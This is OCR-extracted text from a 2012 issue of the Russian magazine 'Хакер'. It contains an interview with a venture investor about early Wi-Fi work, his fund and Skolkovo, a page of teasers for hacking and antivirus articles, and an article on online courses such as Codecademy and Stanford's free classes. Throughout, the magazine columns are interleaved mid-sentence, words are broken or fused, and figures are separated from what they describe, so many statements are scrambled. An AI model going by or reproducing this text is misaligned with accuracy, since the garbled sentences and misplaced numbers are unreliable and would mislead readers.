много независимых вещей. Это, в отличие от

Вся история 90-х строится н а том, что мы

блему в более масштабном виде. Так я начал двигаться к своему фонду.

РОР'шных или ОЕС'овских, открытые про­

были воспитаны на инженерной науке , на

токолы, соответственно, с их помощью можно

создании этих, в каком-то смысле единичных,

интересны х компани й, у которых нет знаний ,

Меня начало увлекать , что есть много

много чего организовать в сетях. Нам нужно

образцов, чтобы удивить мир. Ч тобы показать,

а я мог бы с ними поделиться, потом вложить

было передавать для «звездных войн>> целую

что <<мы не хуже>>. Коммерческая составляю­

куда-то деньги.

кучу потоковой информации, сливать с разных

щая ни у кого не сидела в голове- было жела­

маленьких спутников. Это можно было делать

ние сделать и удивить.

единственно таким вот образом. Новорожден­ Мы к этому времени уже начали сотрудни ­ чать с

Sun. И

вот они присылают нам спец­

ификацию и говорят: « Е сть протокол

Когда мы делали первый

VPN,

интернета

еще толком не было , браузер появился позже .

ной России все это уже было не нужно.

802.11,

Я очень люблю молодых nредnринима ­ телей , которые говорят совершенно новые и порой непонятные вещи ... Но главное, чтобы они говорили на понятно м языке

...

Всесуперкомпаниисоздавалисьлюдь­

Сервер, установленный в нашей компании

<<Элвис+>>, был в nервой полусотне [если не

ми в возрасте от

в числе первых нескольких десятков) веб­

статистику потерянных компаний и компаний,

20 до 30 лет.

Н о если брать

который сейчас находится в разработке, а вы

серверов в мире. В этой эйфории мы ползли

которые выстрелили для венчурного капи­

можете свар г анить РСМС I А-карточку?>>. Ну, я

за Sun'oм, который « п рисылал н ам девять тонн

талиста, то, на п ротив, полу ч ается, что нужно

и собрал команду ...

оборудования>>. Мы начали строить мейл­

вкладывать в людей, которым уже

серверы- это направление потом выродилось

:). У

в компанию <<Эл вис Телеком>>. К примеру,

доводят до логического конца то, что созда­

мы делали факс-серверы- у

ют. И пусть на них не заработать

Сам nротокол

802.11

мы , конечно, не изо­

брели . Этим занимается lпterпet Eпgiпeeriпg

Task Force.

Мы, конечно, писали какие-то

до п олнения . Считать нас родителями

Wi-Fi

не­

правильно, но первые рабочие образы сделали мы. В общем, были пионерами. Мы побили Motoгola, военных, и много

Microsoft такой

появился только где -то в конце 90-х годов. Мы пионерили во многих этих вещах . И сейчас вспоминаешь и думаешь: <<Вот ты хо­

на

5-,

40-50

лет

них есть опыт и они, по крайней мере,

Google

1000%,

как

или на чем-то там, но ты nолучишь

10-кратный возврат инвестиций.

Должен быть баланс между риском

дил по таким кладезям идей, и если бы кто-то

вложения денег в очень молодые головы и в

кого еще. Была интрига: ведь Suп раздал

мог правильно вложить бизнес-науку ... >>. Было

состоявшихся предпринимателей [так назы­

конкуре н тные предложения нескольким фир­

множество инноваций, но мы не знали, как ими

ваемых

мам. И вот мы, какие-тонепонятные русские,

распоряжаться. Д ля меня бизнес тогда был

имелинеуспешный бизнес и пытаются вести

привозим работающий образец. Все в шоке

п ростой : что -то сделать, продать, заработать

успешный, либо уже сделали успешный и те­

и в трансе . Suп принимает решение, ч т о в нас

деньги.

перь хотят создать еще лучше. У после д них,

надо инвестировать. Для них это была во­

repeated eпtrepreneurs), которые либо

У нас было много собственных идей ,

обще первая в истории ком п ании и н вестиция

но для нас было важно знать , « ч т о проис­

в кого-либо.

ходит на кухне ». Интернет не был сильно

ХАКЕР

026

www.epidemz.net

04 / 159/2012


Интервью с венчурным инвестором

по меньшей мере, есть жила пре одолеть все

и там уже существую т двадцать компаний по­

ная, способная и самокритичная команда.

болевые точки, удары, и они дойдут до конца,

добного рода ... Было бы странно поверить, что

А если они на что-то не способны, то должны

они все это уже проходили. А молодой человек

все будет хорошо. Особенно когда антрепренер

четко открыться и сказать: у нас нет пони­

даже с супереветлой идеей может сломаться,

впервые делает компанию, имеет только идею,

мания в такой-то области, или, например,

или его вообще пенесет в десяток других идей,

и даже прототипа как такового у него еще нет

поэтому есть неуверенность в этом деле.

Увы, это не наша стадия.

В фонде

Almaz 2 мы

...

маркетинг. Д олжны признавать: да, у нас есть хороший человек, но мы хотели бы другого, вот

планируем вложиться

где-то в сорок компаний очень ранней стадии,

нет в команде человека, который понимает

КА К ПРИХОДИТЬ К ИНВЕСТОРУ ?

с такими-то параметрами.

Важно, чтобы люди понимали, в какой

когда они еще требуют небольших денег.

Есть такая nроблема, что люди пытаются

Но мы будем это делать вместе с акселерато­

прийти прямо ко мне. Но лучше, когда они по­

рынок они играют. Нуж но понимать свое место

рами, либо с какими-то инкубаторами. Кто-то

падают в систему и наш процесс. Когда пишут

в рынке, кто ваш реальный конкурент. Когда

другой будет «нянчить>> всех этих людей,

напрямую мне, я могу что-то случайно про­

пишут в конкурентах

которые будут эванить по ночам и за давать

пустить, не прочитать- сыпется оче нь много.

курент, даже у

вопросы. Нас не хватит на них . Но мы сможем

Начинаются обиды. Предприниматель же счи­

есть всего четыре компании, которые движут

подобрать их на следующей стадии, когда они

тает, что то, что у него сделано- это лучше

миропонимание:

уже немного оперятс я и смогут двинуться на

всего и неповторимо, и в мире такого больше

и Amazoп. Все остальные пытаются под­

следующий этап . Наш фонд старается не участвовать в опе­

ративном управлении компаний, в которые

Google ... Ну, он у всех кон­ Microsoft и IBM. Сегодня вообще Apple, Google, Facebook

нет. А если я не уделяю этому внимания, значит

строиться, в том числе и

я идиот, или зажравшийся ... человек .

найти, как и где сканкурировать с этой новой

Правильно nрийти к венчурному инвесто­

Microsoft . Пытают ся

волной и остаться на вершине. Народ ленится посмотреть , что, вообще­

инвестировали. Да , приходится влиять на

ру- это сначала сходить на его сайт и посмо­

него. Иногда. Но забирать эту пальму пер­

треть, что именно он хочет, что рассчитывает

венства у антрепренера- самоубийство,

увидеть. Как правило, мы публикуем такие

компаний, у которых есть деньги. И нужно

и мы стараемся этого никогда не делать .

требования .

сравниться с ними с точки зрения своих ре­

то, в области есть куча проинвестированных

сурсов, людей. Понять, как выиграть у них эту игру. П онять, как двигаться дальше, как будут использоваться деньги, зачем вообще нужны деньги.

СЧИТАТЬ НАС РОДИТЕЛЯМИ

Важно пони мать : венчурный фонд- это

WI-FI

НЕПРАВИЛЬНО,

НО ПЕРВЫЕ РАБОЧИЕ ОБРАЗЦЫ СДЕЛАЛИ ИМЕННО МЫ.

сервисная компания. Это не есть компания, которая ведет тебя к успеху. Это всего-навсего

сервисная компания, которая помогает тебе туда прийти. Поэтому инициатива всегда должна находиться в руках СЕО, предпринима ­

теля !или антрепренера, как мы чаще говорим! и так далее.

Компания для nредnринимателя- ребе­ нок. Самон-неумелый родитель . А мы­ эдакие опытные няни . С этой точки зрения,

если мы будем навязывать ему, что делать, это будет неправильно. Он должен обращаться Во всем венчурном мире ты лучше работа­

к нам и говорить : <<Вот у меня ребенок захны­

ешь с nроектами, которые приходят по какой­

кал, что делать? Какие бывают варианты, что

серьезная завязана- это требует очень

торекомендации,отчеловека,которомуты

мне нужно сделать, чтобы он успокоился? Или

много денег. Мы все-такинебольшие фонды,

доверяешь. Когда тебе говорят: «Сащ посмо­

«Вот он хочет заниматься какими-то другими

и рассчитываем вложить lв «Алмазе>>, по

три, вроде бы интересно>>, то в первую очередь

игрушками, делать что-то другое. Что в таком

крайней мере ! за время жиэни семь, макси­

ты, конечно, смотришь на эти проекты .

случае предпринять? Дать ему возможность

В некоторые ниши мы не вкладываем­

ся. Например, в

e-commerce,

где логистика

мум пятнадцать миллионов в команду. Этого

Я не люблю бизнес-планов. Их никто

заниматься другими игрушками?>>. Вот здесь

явно мало для построения такого бизнеса как

не любит. Это в каком-то смысле устаре в­

венчурный капиталист очень полезен: он мо­

e-commerce

ший формат. Нет, конечно, бизнес-план был

жет прийти, помочь и многое сделать.

и уверен н ости, что эта компания

взлетит и куда-то двинется.

нужен когда-то, когда не было возможности

Часто венчурные капиталисты выступают

запомнить и проверить все, что тебе говори­

в роли такого

большие риски, но они измеримы в реальных

ли . Сейчас все это можно в два счета сделать

выстроить команду, заменить, подрастить

деньгах, которые мы можем дать. Даже если

в презентации на пятнадцать слайдов и все

ее. Но все антрепренеры разные. Бывают

компании требуется больше чем пятнадцать

факты прикрыть линкамина отчеты, справки,

и такие, кто считает, что раз их компания

миллионов, с каким-то партнером ты можешь

аналитику и так далее. Хорошо, когда прихо­

растет, приносит прибыль !хоть маленькую!,

это сделать.

дит презентация и к ней существуют сопут­

значит, все - они г ерои, они уже могут жить не

ствующие материалы: ты можешь почитать,

по средствам.

Нам ближе софтверные компании. У них

У нас есть четкое требование: мы хотим видеть, что это миллиардный рынок . При­

HR

или хэдхантера , помогают

проанализировать и сказать: <<да, вот анализ

П РО МОЛОД ЫЕ ПРО ЕКТЫ

чина проста: мы должны бы т ь уверены, что

по конкуренции с делан правильно>> или

у компании есть возможность маневрировать.

<<анализ рынка и позиционирования сделан

Еще несколько лет назад мы смеялись над

Если компания врывается на только откры­

неверно>>.

тем, что есть такие чемпионы всех конкурсов,

вающийся рынок !даже если этот рынок очень

Очень важно, когда человек хорошо nред­

которые с одним и тем же nроектом ходят

интересен в перспективе, но его размер со­

ставляет, что он умеет и что нет. Ведь важнее

по всем тусовкам и везде его продвигают. Их

ставляет всего порядка двадцати миллионов!,

всего понять, что к тебе пришла правиль-

было считанное количество. На сегодняшний

ХАКЕР

027

04/159/2012

www.epidemz.net


·coVER STORY который занимается наnравлением Softwaгe­

Defined

Netwoгking. Ведь проблема номер

один больших компаний и тел екома- уде­ день я бы так не сказал. Существует достаточ­

определенного размера и дальше роста у них

шевить все затраты на сети и ЦОДы за счет

но много интересных проектов, интересных

нет. Они не могут вырваться из этой ниши, пото­

виртуализации слоя сети . Это большое

уже с точки зрения совершенства представ­

му что у них нет базы знаний, они не знают, что

направление, модное и популярное. Я с трудом

ления.

дальше существует в индустрии, что они могли

затаскиваю его в Сколково, чтобы построить

бы решать. И это только одна из проблем.

исследования совместно со Стэнфордом . Но я

Есть nроблема- многие идеи мелкие . Они нишевые и нацелены только на Россию. Люди

Когда !Т-nредnриниматели быстро до ­

рассчитываю, что из этого проекта может

не осознают рынка глобального. А на россий­

биваются очень больших усnехов, а nотом

появиться новая плеяда мыслящих ученых,

ском рынке только складывается культура

начинают nросаживаться . Это другая про­

могут родиться прорывные компании.

покупки компаний . Я всегда привожу в пример

блема. При чина одна- они зарабатывают

Google . Статистику за 2009 или 2010 год, когда они купили 42 компании. Из них только две были объемом 400 миллионов и миллиард. Все остальные сорок были ... ну, средний чек составлял 25 миллионов. Значит, кого-то они

много денег сами, владеют практически

ково должно сыграть большую роль именно

всей компанией и зарабатывают от

в накоплении и формировании базы знаний

в следующий этап у них нет. Им сложно- они

отраслевые НИИ, сейчас их нет. То есть, где

купили за пятьдесят, кого-то- за один. Услов­

хотят, но, с другой стороны, им придется рас­

должна база знаний формироваться- непо­

но . Или за

В России чек будет ниже в

1 до 10

У нас не формируется база знаний. Скол­

миллионов долларов в год. Им ничего не

в индустрии. Быть может, даже большую, чем

надо- у них жизнь удалась. Амбиций роста

оно играет сейчас . В старые времена были

ставаться с этим полным владением того, что

нятно. У нас есть неплохие сетевые инженеры,

раза. Условно, средний чек сделки в России

они делают. Есть, к примеру, такая компания

есть не плохие институты, которые готовят

должен составля ть

JetBгaiпs из Пит ера, вот она запросто может

неплохих сетевых инженеров, просто они

на

3,

10-30.

25

миллионов поделить

ну пусть это будет

ний чек

2-3

8-10

миллионов. Сред­

миллионов, но если я хочу иметь

стать миллиардной компанией. Но их, видимо,

не имеют индустриального пони мания, куда им

удовлетворяют те

дернуться и двинуться. Если же создать базу

40-60

миллионов долларов

соответствующий возврат, я должен вложить

оборота, с которыми они работают. И владель­

знаний, они будут видеть: вот оно - лежит.

более

цы как бы игнорируют всех, им не интересны

Скажем, к примеру, если я напишу некий

деньги никаких венчурных капиталистов.

софт, чтобы роутер быстрее работал [именно

Но приятная штука в том, что в России таких

софтовый роутерl, то вот- я могу создать

компаний довольно много.

и компанию на основании моих исследований.

300

30%

компании . Я должен вложить тысяч

и получить обратно свои

это будет нормально . Но за

3 миллиона, вот 300 тысяч, вроде

бы, и компанию не построишь. Или надо на­ строить такие компании, которые бы уклады­

Вот такие я вижу возможности.

вались в эту экономику . Это та часть осозна­

llk•l•ik•l:lel

ния, которая еще приходит. И формируется

Если я увижу в Сколково « расnил бабла» , я

nравил. Сейчас же там для компаний, которые

венчурный рынок. Н о количество компаний

сразу наnишу заявление об уходе . Думаю, та к

получают гранты, устанавливают правила:

выросло, хотя есть вот такие проблемы .

поступят и другие люди из совета директоров.

например, средняя зар плата должна быть

Эрик Шмидт, любые другие иностранцы ... Если

только такая-то. Или говорят, что нельзя пере­

удивить мир (новые Paгallels, Касnерские,

они это увидят, они уйдут. Может ли в Скол ко во

распределять бюджеты. Но ведь бывает и так ,

Акронисыl не много . Я всегда объясняю, что

появиться « распил>>? В строительстве, в схе­

что компания очень динамичная. Может быть,

причина в том, что, во-первых, у нас нет таких

мах строительства, наверное, что-то может

компания заявила, что бюджет надо было

индустриальных лидеров, чтобы вот э ти «темы»

про изойти. Но чтобы он появился именно

потратить на маркетинг, но теперь его нужно

можно было ловить и пони мать, где существуют

в области фондирования компаний ... вряд ли.

потратить на покупку пяти дополнительных

«дырки», которые можно залатать . Во-вторых,

По крайне мере, там явно сегодня не нужно да­

компьютеров. А им говорят- нет, нельзя, надо

у нас нет исследований . В старые времена

вать никому никаких о тк атов, чтобы получить

тратить на маркетинг! Вот эта совковость, ко­

были отраслевые НИИ, сейчас их нет или

гранты или статус участника. Все это делается

торая сидит в Счетной палате , в Минфине, она

совсем мало. То есть, непонятно, где должна

очень по-честному.

и заставляет Скол ко во жить по правилам, и это

Проектов

«go global», которые

могут

формироватьсябаза знаний. Поэтомукомпа­

Сколково должно быть исключением из

Грустно , но хорошие комnании не хотят

можетпогубитьСколково .

нии в основном создаются людьми, которые

брать гранты в С колково-с ними куча возни.

начинают писать софт: смотрят, что где-то есть

Я говорил со многими, и они считают, что у них

дженералисты, которые имеют nонимание

какие-то проблемы, и что-то там решают. Часто

нет времени на все эти отчеты. Но пока эти

в технологиях, имеют достуn к эксnертизе.

решают они очень нишевые задачи. А вот рас­

самые отчеты не сделаешь- следующий этап

Как венчурный капиталист, я ведь не экс перт

ширение бизнеса зачастую затруднительно.

гранта не получишь . Значит, возникают кассо­

во всем. Если мне нужна какая-то специальная

Есть куча людей, которые на таком нишевам

вые разрывы. Вот компании и считают, что все

экспертиза, я нахожу человека на мировом

софте зарабатывают деньги

это нафиг не нужно, один геморрой.

[Famatech и их

RAdmiп, скажем, и можно назвать еще много

интересных компаний), но они вырастают до

Сейчас я затаскиваю туда исследова­ тельский nро е кт nод названием

OpenFiow,

Сколково нужны такие эксnерты­

рынке, которому я могу доверять: я знаю, что

это именно тот человек, который может под­ сказать мне, хорошо это или плохо. Н о я все же отвечаю за результат и своей репутацией. В Сколково нужно создавать атмосферу nростоты, nрозрачности , доверия и реnута­

цианной ответственности. Когда не просто

ТРИ ПОЖЕЛАНИЯ ПРЕДПРИНИМАТЕЛЯМ

существует какая-то компании, а за компанией

строит конкретный антрепренер, чья репута­ ция какими-то вещами либо поднимается, либо

1

БЫТЬ НЕМНОЖКО

CRAZY

2

УЧИТЬСЯ НА ОШИБКАХ

3

СТАВИТЬ АМБИЦИ­

опускается. Вот в таком случае, думаю, такая

ОЗНЫЕ ЗАДАЧИ

атмосфера сложится. Так живет Кремниевая

Стремиться оставаться

И делать их как можно

И так их отмерять, чтобы

долина. Чтобы создать это, нам нужно, чтобы

немножко ненормальным,

больше. Но никогда

даже если ты достигнешь

было кипение, круговорот открытости и всего

даже если это непонятно

не повторять!

20-30%

окружающим.

от задуманного,

то мог бы собой гордиться.

остального. Я хочу верить , что получится. Иначе будет трудно запустить инновационную индустрию в Ро ссии.

::I:

ХАКЕР

028

www.epidemz.net

04/159/2012


Preview

30 страниц на одно й

поло се .

Ти з ер н екото ры х с тате й .

PCZONE УНИВЕРОНЛАЙН ЗО

Осв(Jить новый для себя язык програм­ мирования сего дн я просто как никогда.

Чтобы получить минимальный базис, с помощью которого можно начать

разработку простей ших приложений, теперьнеобязательнодажечитать

умные книжки. Для многихтехнологий появились очень доступные и понятные

обучалки,которыевинтерактивном режиме позволяют пощупать новуюдля

себя технологию без лишней при л юдии и зан удства. А для фундаментальных

предметов ведущие ВУЗы мира разра­ батываютонлайн-курсы, позволяю щ ие прослушать лекции, ранее доступ н ы е

только студентам за бешенные деньг и.

взлом

PCZONE

DuckDuckGo 36

РАСШАРИТЬ ПРИЛОЖЕНИЕ !

«GOOGLE СЛЕДИТЗА ТОБОЙ , МЫ-НЕТ »

М ожнолипере н естиокноприложенияиз

Googleyжe да вн о м ейнстрим. Гики

Wlпdоws - с и с те м ы в Liпux и п ро д о л жить

предпочитаю т др угой пoиcкoвик ­

NET п р иложени й ,

с ним рабо т у? М ожно, есл и ус т а н овить на

DuckDuckGo, ко т орый заботится об

wе Ь - р азрабочик и , мо гутс та ть причиной

обоих ком п ью т ерах yтилитyWinSwitch.

анонимности п о л ьзователей.

вз л ома. Р азбираемся на при м ере.

взлом

ТЕМНАЯ СТ ОРОНАТРАССИРОВКИ

56

Механизмы отла д ки и трассировкиАS Р.

кот о ры ми пользуютс я

MALWARE

взлом -Maii.Ru Агента ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ ПЕРЕПИСКИ И КОНТАКТАМ В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ

..

-~

ВЗЛОМ MAIL.RUAГEHTA

60

Эта статья н е о вз л оме замечательного мессенджера. Это история атом, как с

нуля был отреверсен формат, в кото р ом хранятся сооб щения пользователя.

Х АКЕР

С АНТИВИРУСОМ ПОКОНЧЕНО Последняя статья из серии о внутреннем

устройстве анивирусов. В этот раз мы рассмотрим мониторинг сетевой актив­ ности и песочницы.

04/159/2012

НЕИЗВЕСТНАЯУГРОЗА Испытываемэвристику аверовна самых новых вирусах, которые еще не

появились в базах п опулярных анти­ в и русн ы х решений.

029

www.epidemz.net


PCZONE

Каnитан Улитка

МОЖНО ЛИ СТАТЬ СПЕЦИАЛИСТОМ В НЕ ВЫХОДЯ ИЗ ДОМА? ДА! На одни х только статьях журнала « Хакер » далеко не уедешь. Это я тебе точно говорю . Если х очешь стать настоящим специалистом в области IT, необходимо учиться

и обязательно получить фундаментальные знания о предмете .

К счастью, сегодня для этого возможностей больше, ч е м когда -либо . В Сети не только доступно множество учебников бесплатно , но и стремительно развиваются совершенно новые , прогрессивные способы обучения . И особенно э то

касается нашей -IТ'шной- специальности .

ц

IT,

ель данного материала - по казать, насколько просто сегодня можно

обучаться самостоятельно . Бы-

стро осваивать новые технологии и языки

программирования. При этом делать это не в напряг и получать настоящее удовольствие

от обучения. Я н е претендую на полноту кар­ тины, и эта статья, само собой, не является

сборником всех проектов, которые могут по­ мочь тебе в самообразовании. Но я постарал­ ся собрать некоторые особенно интересные сервисы, которые были интересны лично мне.

Уверен, они пригодятся и тебе.

ХАКЕР

030

www.epidemz.net

04 / 159/2012


Универ онлайн

Изучаем английский язык

· · .

Я с ерьезно рискую, начиная этот материал со

интересные возможности. Большинство авто­

Короче говоря, изучение языка нужно добавить

с лов «английский язык>> . У многих людей с ним

ритетных конференций проходит на английском.

в свой личный список дел в качестве одного

с ложности, и ирония в том, что чем серьезнее

В самых круnных сообществах сnециалистов

из приоритетных пункта в. Сказать по правде,

проблема, тем больше люди противятся его

nринят английский язык. Известные ученые ве­

абсолютное большинство ресурсов, о которых я

изучению, приДумывая отговорки и оправдания .

дут блоги и пишут статьи на английском языке .

буду говорить далее, требуют хотя бы минималь­

Как бы там ни было, могу тебе сказать с пол-

На английском языке говорят в Силиконовой до­

ного знания английского. Однако для первого

ной уверенностью: по-настоящему успешный

лине. И на нем же изъясняются программисты из

nроекта из нашего обзора иностранный как раз

!Т-специалист если и может обойтись без

Индии, которых стало так много, что спрятаться

английского языка, то упускает при этом многие

от них у тебя не получится при всем желании

LINGUALEO

:1.

ческих минивыступлений с TED.coml, лекций из западных университетов [в том числе по

Есть простое правило: чтобы лучше и уверен­

иностранному языку! и так далее. Все это

нее подтягиваться на турнике, нужно больше

разбито на категории по тематике, сложности

и чаще подтягиваться на турнике. Просто ин­

и рейтингу у пользователей. Но главное за­

тенсивнее заниматься. Так же и с английским:

ключается в том, как именно сервис позволяет

чтобы хорошо понимать на слух английскую

этот контент потреблять. Рядом с видео выво­

речь, не вслушиваясь в каждое слово в по­

дится полная расшифровка речи, поэтому ты

пытке разобрать хоть что-то, нужно больше

всегда можешь прочитать непонятный на слух

слушать этой самой речи. Можно начать с про­

фрагмент. Встречаешь не известное слово?

~

.... ~--·"-"

1

себя контент и быстро разбираешься с непо­

смотра какого-нибудь сериала, подключив

Один клик,- и

для уверенности оригинальные субтитры, но ...

перевод и заносит это слово в твой личный

нятными местами. Для себя я не вижу лучшего

по сравнению с тем, что представляет сервис

словарь, чтобы дальше с помощью самых раз­

способа, во-первых, nополнять словарный

Lingualeo

тут же показывает

не нужен- напротив, он направлен на то, чтобы

ты быстро прокачал свои знания «ИнЯз'а» .

Lingualeo.гu,- это прошлый век. В его базе

ных упражнений ты мог запомнить его и начать

запас, а во-вторых, привыкнуть к английской

уже собрано огромное количество сериалов,

использовать в нужном контексте. Никаких

речи. Чтобы «Отрабатывать» те слова, которые

всевозможных фильмов, заnисей различных

тебе больше ковыряний с субтитрами и сло­

nросто встречаются в интернете, я давно себе

семинаров и выступлений !например, темати-

варей, -ты просто смотришь интересный для

установил специальный аддон для браузера .

Онпайн-универы Найдется немало людей, которые захотят по­

что всему можно научиться самостоятельно,

[например, в iTunesl, но и вообще формиро­

спорить о том, необходимолиИТ-специалисту

-было бы желание. Последнее стало еще

вать культуру преподавания университетских

высшее образование. Правы те, кто говорит, что

проще после того как ведущие западные вузы

nредметов онлайн. Хотел бы я сейчас отметить

фундаментальные знания остро необходимы.

с зашкаливающей стоимостью обучения начали

подобные инициативы со стороны российских

Но можно согласиться и с теми, кто утверждает,

не только выкладывать видео своих лекций

вузов, но здесь сказать пока нечего.

У ЧЕБНЫЕ К У РСЫ ОТ СТЭНФОРДА

ственный интеллект» ! a1.:cla~.coml. <<Введение

Криптография ! cs101-cla!>_s.oгa l;

в базы данных» [ db:c l ass.oгa l . Каждый из курсов

Помимо непосредственно ИТ'шных предметов,

Университет Стэнфорда, расположенный в Кали­

состоит из лекций, проверочных работ и финаль­

есть пара курсов по предпринимательству

форнии , известен по всему миру. Фактически это

ного экзамена. В случае успешного завершения

[в области высоких технологий). Я пока успел по­

кузница кадровдлятехнологических комnаний

обучения студент получает сертификат в виде

слушать курс по машинному обучению и получил

Силиконовой долины, многие из которых рас­

РОF-файла, заверенного цифровой подписью

огромное удовольствие. Курс построен таким

положены в Пало Альта- в том же городе, что

преподавателя.Экспериментоказалсяуспеш­

образом , чтобы быть понятным практически

и сам университет. Попасть в С тэнфорд-мечта

ным , и в начале года Стэнфорд анонсировал

каждому, хотя, безусловно, знания в области

для многих молодых людей, которые жаждут

сразу дюжину новых курсов , в том числе:

дискретной математики и математического ана­

Информационная безопасность ! secuгitv Q.ass.oгa l;

лиза будут здесь очень полезны. Надо сказать,

читаешь про С тз н форд, тем больше радуешься тому факту, что осенью университет запустил

Проектированиеианализалгоритмов

субтитрами на случай, если что-то сложно разо­

проектбесплатныхонлайн-курсов.Изначально

[~ecur ity_class..osal; Теория и гр !cs i 01.:clas~.o.rgl; Информатика !cs iU1:class.orql;

брать на слух. Как правило, язык очень простой,

сделать карьеру в области ИТ. Чем больше

всем желающим nредлагалось пройти три курса :

«Машинное обучение» ! ml.:.:l~~.nro l. <<Искус-

MITX ОТ МАССАЧУСЕТСКОГО ТЕХНОЛОГИЧЕСКОГО ИНСТИТУТА

лась информация о первом курсе, который будет

что видео любого из курсов сопровождается

позтому все понятно даже со средним уровнем

английского .

да вателей-профессор Джеральд Сассмен,

проходить с помощью этой системы- <<6.002х:

который создал язык

Схематехника и электроника». Обучение начнется

одного из самых лучших учебников по програм­

весной и потребует примерно десять часов в не­

Scheme

и является автором

вестном западном вузе. Тоттоже пошел по стопам

делю. Предмет непростой, поэтому допускаются

мированию- <<Stгuctuгe and lnteгpretation of Computer Pгograms». В скором будущем обеща­

С тэнфорда и в начале года анонсировал раз­

только студенты, обладающие необходимыми

ется появление и других предметов. Уверен, что

работку

знаниями по электричеству, магнетизму и диффе­

подобное по зубам и российским учебным заведе­

ренциальномуисчислению . Средитрехпрепо-

ниям, которые просто обязаны не отставать.

Ты наверняка слышал и о

MIT- не

MITx -технологической

менее из­

платформы для

онлайн-образования. И вот уже в феврале появи-

Х АКЕР

031

04 / 159/2012

www.epidemz.net


PCZONE ~ iq"!.et:Y

JavaScript Главное, о чем я хочу сегодня рассказать­

сколько особенно модных языков програм­

взаимодействие с пользователем. Особен­

конкретный язык программирования. Тут

мирования: Python, Ruby !п люс Ruby on Rail sl и, конечно же, Java5cгipt IHTML51. С послед­

Java5cгipt совершенноневозможные вещи:

очень заметна закономерность: чем актив­

него и начнем.

взять хотя бы проект виртуальной машины,

нее язык развивается и набирает популяр­

Ни одно современное веб-приложение не

на которой вполне себе успешно запускается

ность, тем больше появляется инструментов

обходится се г од ня без ударной дозы кода

Linux l be l laгd . o г g/jsl i n ux l . Но этот случай мы

для его изучения. Для nримера я взял не-

на J5, на которо м полностью реализовано

рассматривать не будем

э т о серви.сы, позволяющие изучить вполне

CODECADEMY

:1.

Се крет у спеха в изящн ос ти процесса обу­ чения. С помощью специального интерфейса

www.cod ec ademy.com

ст у дентам сразу же начинают рассказывать

о базовых особенностях языка и его с ин т ак­

Простой вопрос: какой самый проверенный

сиса, и, что важнее всего, предлагают сразу

способ выучить новый язык программирова ­

проверить знания в действии, набрав код

ния? Взять умную книгу и начать ее читать.

в специальной консоли. Все это происходит

Этот подход никогда не устареет. Так было

в браузере, без необходимо с ти уста навливать

двадцать лет назад, так есть и сейчас . Однако

что-либо на своем компьютере. Шаг за шагом

сложно представить, что к

ные гики умудряются имплементировать на

21

веку не приду­

_,.,..,. WeH

donellь.\ong

HndOLrtЬytyp\l'lg)'OUr.-

isyouriiCIIII!?

Clfte.-~cllq)\etethetnstf"Vtti.ons).

Gl"eCtjoЬINoll,iet'sdosomemoth.You~doiiiOththroughprogriiiiiiiHIQI

Totolw\ot•2•2,jvsttype 2•2

...... -·-··-.. " ........

можно быстро разобраться, что к чему, и по­

11

нять все базовые принципы Java5cгipt. Чтобы

тем более- обучения программированию.

еще больше стимулировать студентов к обуче­

: ::1:•! '= 0 ~:-·:~lloк,..;ooooelt.\

Codecademy- э т о стартап, позиционирующий

нию, по мере nрохождения курса им выдаются

себя как школу разработчика. За семь десят

награды.

Прое кт быстро получил финансирование

For~~~e,thot'dЬe " Ryan· . tangth

_,

мали более прогрессивных методов обучения,

два часа после открытия он собрал более

i.nquote:s

onctendi.ngi.twf.th. l tniJth .Pr-tsfoet'ltercfterwords(dothisf~nowor~

1

..... ••• loLooll ··•••! "".. - .......... , , -,.,

nлатформе Codecademy. Проект выбрал

двухсот тысяч lвдумайся в цифру!! начинаю­

и очень скоро обещает значительное попол­

модель UGC IUseг-geneгated contentl и сейчас

щих программ истов, предложив им пройти

нени е учебных курсов. Уже сейчас доступна

активно приелекает к n ополнению контента

инт еракти вный курс Java5cгipt.

система для создания своих курсов на готовой

сообщество .

ВЫУЧИТЬ

JQUERY

ЗА ТРИДЦАТЬ ДНЕЙ

портал

Nettuts+, известный своими каче­

ственными обучающими статьями, разработал специальный курс . Курс разбит на тридцать

leaгnj query. tutsplus . com

уроков-скринкастов по пятнадцать минут

каждый, что позволяет день за днем посте­ Неотделимой частью Java5cгip t постепенно

пенно брать библиотеку на вооружение. Как

стала библиотека jQueгy, упрощающая работу

ни крути, а пятнадцать минут можно найти

с НТМL-документом, обработку событий,

всегда. Да и формат обучения очень приятный:

создание анимации и реализацию AJAX.

лично для меня нет ничего более понятного,

Фактически jQueгy во многом изменил подход

чем непосредственная демонстрация кодинга

к прогрвммированию на Java5cгipt. Разобрать­

с комментариями по ходу дела. Для тех, кто

ся с библио т екой в принципе неслож но. Но

только начинает изучать J5, есть и видеокурс

чтобы сделать это еще более безболезненно,

этого же автора I Ьi t .l y/AqK4sO I.

ПЕРВЫЙ ПОЛЕТ НА JQUERY

рых включает в себя обучающий скринкаст

Learn jQuery in зо Days (It's free.) Each d~y you' ll Ье sent 11

f~e

video \esson.

Лt

theend of the

month, you'U Ье аЫе to confidently use jQU('ty ln your projects, withouthelp.

и интерактивные упражнения по программи­

codesc hool .co m/co urses/j que г у-а i г-fi rs t-f 1igh

рованию, реализованные прямо в браузере. За

прохождение заданий начисляются очки !на­ Если спросить, кто снимает скринкасты

пример, 350 за решенную задачку! . Е сл и где-то

эталонного качества, то среди победите-

возникла трудность, можно попросить под­

лей совершенно точно будет онлайн-школа

сказку, но в этом случае не избежать штраф­

программирования c<>de school . Это очень

ных баллов. На первом уровне предлагается

профессиональный nроект, предлагающий

nройти азы Java5cript, на втором- селекторы,

как платные, так и бесплатные курсы для

на третьем- (55-атрибуты, на четвертом­

специалистов различного уровня. Курс <<jOue гy

манипулирование с НТМL-элементами и DOM,

Аiг : Fiгst Flight» долгое время был платным, но

на пятом- работа с событиями. Чтобы пройти

с недавнего времени открыт всем желающим.

курс, необходимо выполнить пятьд есят пять

Он состоит из пяти уровней, каждый из кота-

простых и не очень у nражн ений.

ХАКЕР

032

www.epidemz.net

04 / 159/201 2


Универ онлайн

Ruby и Ruby оп Rails

.{; RAILS

Если ты читал в прошлом номере инт ервью

все . И ч ем бо льш е растет спрос, тем больше

Впр оче м, знание языка пригодится, даже ес ли

с Аленой Владимир ской, кото рая по прав у счи­

ста н овятся зарплаты. Е сли у тебя есть опыт

ты не собираешься работать профессиональ­

тается ведущи-м хедхантером Р унета, то уже

программирова ния , и ты хочешь переква­

ным разработчиком.
